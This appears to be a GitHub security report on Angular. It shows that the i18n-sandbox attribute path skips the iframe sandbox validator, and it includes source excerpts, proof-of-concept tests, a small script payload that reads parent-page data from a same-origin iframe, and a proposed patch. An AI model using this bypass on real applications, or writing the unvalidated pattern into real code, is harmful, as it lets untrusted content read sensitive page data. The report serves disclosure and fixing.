Security: Angular i18n sandbox interpolation bypass lets same-origin preview iframes read parent-page data

[foxllb]

Which @angular/* package(s) are the source of the bug?

Don't known / other

Is this a regression?

No

Description

Report description

Angular i18n sandbox interpolation bypass lets same-origin preview iframes read parent-page data

The problem

Please describe the technical details of the vulnerability

1. technical details

Angular treats several iframe policy attributes as security-sensitive and normally rejects dynamic
updates to them through ɵɵvalidateAttribute:

export function ɵɵvalidateAttribute<T = any>(value: T, tagName: string, attributeName: string): T {
  const lowerCaseTagName = tagName.toLowerCase();
  const lowerCaseAttrName = attributeName.toLowerCase();
  const validationConfig = SECURITY_SENSITIVE_ELEMENTS[lowerCaseTagName]?.[lowerCaseAttrName];
  if (!validationConfig) {
    return value;
  }

  const tNode = getSelectedTNode()!;
  if (tNode.type !== TNodeType.Element) {
    return value;
  }

  const lView = getLView();
  if (lowerCaseTagName === 'iframe') {
    const element = getNativeByTNode(tNode, lView) as RElement;
    enforceIframeSecurity(element as HTMLIFrameElement);
  }

  const errorMessage =
    ngDevMode &&
    `Angular has detected that the \`${attributeName}\` was applied ` +
      `as a binding to the <${tagName}> element${getTemplateLocationDetails(lView)}. ` +
      `For security reasons, the \`${attributeName}\` can be set on the <${tagName}> element ` +
      `as a static attribute only. \n` +
      `To fix this, switch the \`${attributeName}\` binding to a static attribute ` +
      `in a template or in host bindings section.`;
  throw new RuntimeError(RuntimeErrorCode.UNSAFE_ATTRIBUTE_BINDING, errorMessage);
}

The i18n attribute path does not reuse that validator. During template parsing, Angular only blocks
i18n-* attributes that are Trusted Types sinks. i18n-sandbox is accepted:

} else if (attr.name.startsWith(I18N_ATTR_PREFIX)) {
  const name = attr.name.slice(I18N_ATTR_PREFIX.length);
  let isTrustedType: boolean;
  if (node instanceof html.Component) {
    isTrustedType = node.tagName === null ? false : isTrustedTypesSink(node.tagName, name);
  } else {
    isTrustedType = isTrustedTypesSink(node.name, name);
  }

  if (isTrustedType) {
    this._reportError(
      attr,
      `Translating attribute '${name}' is disallowed for security reasons.`,
    );
  } else {
    attrsMeta[name] = attr.value;
  }
}

At runtime, i18n attribute updates only attach _sanitizeUrl for URL-like attributes. Other
translated attributes, including sandbox, are passed without any validator:

generateBindingUpdateOpCodes(
  updateOpCodes,
  message,
  previousElementIndex,
  attrName,
  countBindings(updateOpCodes),
  SENSITIVE_ATTRS[attrName.toLowerCase()] ? _sanitizeUrl : null,
);

The resulting i18n update opcode is then written back to the DOM:

case I18nUpdateOpCode.Attr:
  const propName = updateOpCodes[++j] as string;
  const sanitizeFn = updateOpCodes[++j] as SanitizerFn | null;
  const tNodeOrTagName = tView.data[nodeIndex] as TNode | string;
  if (typeof tNodeOrTagName === 'string') {
    setElementAttribute(
      lView[RENDERER],
      lView[nodeIndex],
      null,
      tNodeOrTagName,
      propName,
      value,
      sanitizeFn,
    );
  } else {
    setPropertyAndInputs(
      tNodeOrTagName,
      lView,
      propName,
      value,
      lView[RENDERER],
      sanitizeFn,
    );
  }

This creates a validator gap: a normal dynamic iframe sandbox update is rejected, but the same
attacker-controlled value can still be applied through i18n-sandbox.

2. vulnerability reproduction

The attached PoC models a realistic preview workflow:

• the parent page stores a marker representing sensitive page state
• user-controlled preview content is rendered in a same-origin iframe
• the host template relies on sandbox="allow-forms" to keep that preview isolated
• a locale-specific or CMS-managed interpolated value is used in i18n-sandbox

The first PoC test shows the core policy mismatch. The normal path rejects the dynamic sandbox
update:

it('rejects attacker-controlled iframe sandbox tokens on the normal binding path', () => {
  expect(() => {
    createFixtureWithTemplate(
      PreviewHostComponent,
      `
        <iframe
          src="about:blank"
          sandbox="allow-forms {{ attackerControlledSandboxFlags }}">
        </iframe>
      `,
    );
  }).toThrowError(
    /For security reasons, the `sandbox` can be set on the <iframe> element as a static attribute only/,
  );
});

The matching i18n path accepts the same attacker-controlled value and writes it into the iframe:

it('writes attacker-controlled iframe sandbox tokens through the i18n attribute path', () => {
  loadTranslations({
    [computeMsgId('allow-forms {$INTERPOLATION}')]: 'allow-forms {$INTERPOLATION}',
  });

  const fixture = createFixtureWithTemplate(
    PreviewHostComponent,
    `
      <iframe
        src="about:blank"
        sandbox="allow-forms {{ attackerControlledSandboxFlags }}"
        i18n-sandbox>
      </iframe>
    `,
  );

  const iframe = fixture.nativeElement.querySelector('iframe') as HTMLIFrameElement | null;
  expect(readSandboxValue(iframe!)).toBe('allow-forms allow-scripts allow-same-origin');
});

The browser-backed PoC then demonstrates the practical effect. The parent page sets a marker:

document.documentElement.setAttribute('data-session-marker', 'admin-review-token');

The preview iframe receives attacker-controlled sandbox tokens through i18n-sandbox and loads
same-origin preview content:

createFixtureWithTemplate(
  PreviewExploitHostComponent,
  `
    <iframe
      id="preview"
      srcdoc="${escapeHtmlAttribute(PREVIEW_PAYLOAD)}"
      sandbox="allow-forms {{ attackerControlledSandboxFlags }}"
      i18n-sandbox>
    </iframe>
  `,
);

The preview payload reads the parent-page marker:

const PREVIEW_PAYLOAD = [
  '<!doctype html>',
  '<meta charset="utf-8">',
  '<script>',
  'parent.document.documentElement.setAttribute(',
  '"data-preview-read",',
  'parent.document.documentElement.getAttribute("data-session-marker") || "missing"',
  ');',
  '</script>',
].join('');

The test waits for the marker and confirms that the iframe script read parent-page data:

await waitForDocumentAttribute('data-preview-read');
expect(document.documentElement.getAttribute('data-preview-read')).toBe('admin-review-token');

PoC location:

• ./work/angular/i18n_sandbox_bypass/i18n_sandbox_bypass_spec.ts
• ./work/angular/i18n_sandbox_bypass/i18n_sandbox_bypass_browser_spec.ts

One-click demo:

cd ./work/angular
./i18n_sandbox_bypass/run_demo.sh

Observed result:

//i18n_sandbox_bypass:test PASSED
//i18n_sandbox_bypass:test_web_chromium PASSED
//i18n_sandbox_bypass:test_web_firefox PASSED

These tests demonstrate that an attacker-controlled interpolated value can turn a restricted
same-origin preview iframe into one that executes script and reads data from the parent page.

3. patch

diff --git a/packages/core/src/render3/i18n/i18n_parse.ts b/packages/core/src/render3/i18n/i18n_parse.ts
index cfb150ee08..a55776f522 100644
--- a/packages/core/src/render3/i18n/i18n_parse.ts
+++ b/packages/core/src/render3/i18n/i18n_parse.ts
@@ -16,6 +16,7 @@ import {
   VALID_ELEMENTS,
 } from '../../sanitization/html_sanitizer';
 import {getInertBodyHelper} from '../../sanitization/inert_body';
+import {ɵɵvalidateAttribute as _validateAttribute} from '../../sanitization/sanitization';
 import {_sanitizeUrl} from '../../sanitization/url_sanitizer';
 import {
   assertDefined,
@@ -79,6 +80,14 @@ const ICU_BLOCK_REGEXP = /^\s*(�\d+:?\d*�)\s*,\s*(select|plural)\s*,/;
 const MARKER = `�`;
 const SUBTEMPLATE_REGEXP = /�\/?\*(\d+:\d+)�/gi;
 const PH_REGEXP = /�(\/?[#*]\d+):?\d*�/gi;
+const I18N_VALIDATING_ATTRS = new Set([
+  'sandbox',
+  'allow',
+  'allowfullscreen',
+  'referrerpolicy',
+  'csp',
+  'fetchpriority',
+]);
 
 /**
  * Angular uses the special entity &ngsp; as a placeholder for non-removable space.
@@ -91,6 +100,20 @@ function replaceNgsp(value: string): string {
   return value.replace(NGSP_UNICODE_REGEXP, ' ');
 }
 
+function getI18nAttrSanitizer(attrName: string): SanitizerFn | null {
+  const lowerAttrName = attrName.toLowerCase();
+
+  if (SENSITIVE_ATTRS[lowerAttrName]) {
+    return _sanitizeUrl;
+  }
+
+  if (I18N_VALIDATING_ATTRS.has(lowerAttrName)) {
+    return _validateAttribute;
+  }
+
+  return null;
+}
+
 /**
  * Patch a `debug` property getter on top of the existing object.
  *
@@ -388,7 +411,7 @@ export function i18nAttributesFirstPass(tView: TView, index: number, values: str
           previousElementIndex,
           attrName,
           countBindings(updateOpCodes),
-          SENSITIVE_ATTRS[attrName.toLowerCase()] ? _sanitizeUrl : null,
+          getI18nAttrSanitizer(attrName),
         );
       }
     }
@@ -816,7 +839,7 @@ function walkIcuTree(
                   newIndex,
                   attr.name,
                   0,
-                  SENSITIVE_ATTRS[lowerAttrName] ? _sanitizeUrl : null,
+                  getI18nAttrSanitizer(attr.name),
                 );
               } else {
                 ngDevMode &&

diff --git a/packages/core/test/acceptance/security_spec.ts b/packages/core/test/acceptance/security_spec.ts
index 884fea63c1..6fa7f0e34a 100644
--- a/packages/core/test/acceptance/security_spec.ts
+++ b/packages/core/test/acceptance/security_spec.ts
@@ -763,6 +763,24 @@ describe('iframe processing', () => {
 
           expectIframeToBeCreated(IframeComp, {src: TEST_IFRAME_URL});
         });
+
+        it('should error when a translated security-sensitive attribute contains bindings', () => {
+          @Component({
+            selector: 'my-comp',
+            template: ` <iframe
+              src="${TEST_IFRAME_URL}"
+              i18n-sandbox
+              sandbox="allow-forms {{ extraPrivileges }}">
+            </iframe> `,
+
+            changeDetection: ChangeDetectionStrategy.Eager,
+          })
+          class IframeComp {
+            extraPrivileges = 'allow-scripts allow-same-origin';
+          }
+
+          expectIframeCreationToFail(IframeComp);
+        });
       });
     });
   });

Impact analysis – Please briefly explain who can exploit the vulnerability, and what they gain when doing so

An attacker who can control a locale-specific string or CMS-managed value interpolated into
i18n-sandbox can add allow-scripts allow-same-origin to a same-origin preview iframe. This lets
script running inside the preview read data from the parent page in workflows such as document
preview or admin review screens.

i18n_sandbox_bypass.tar.gz

Please provide a link to a minimal reproduction of the bug

No response

Please provide the exception or error you saw

Please provide the environment you discovered this bug in (run ng version)

Anything else?

No response

[angular-automatic-lock-bot]

This issue has been automatically locked due to inactivity.
Please file a new issue if you are encountering a similar or related problem.

Read more about our automatic conversation locking policy.

_{This action has been performed automatically by a bot.}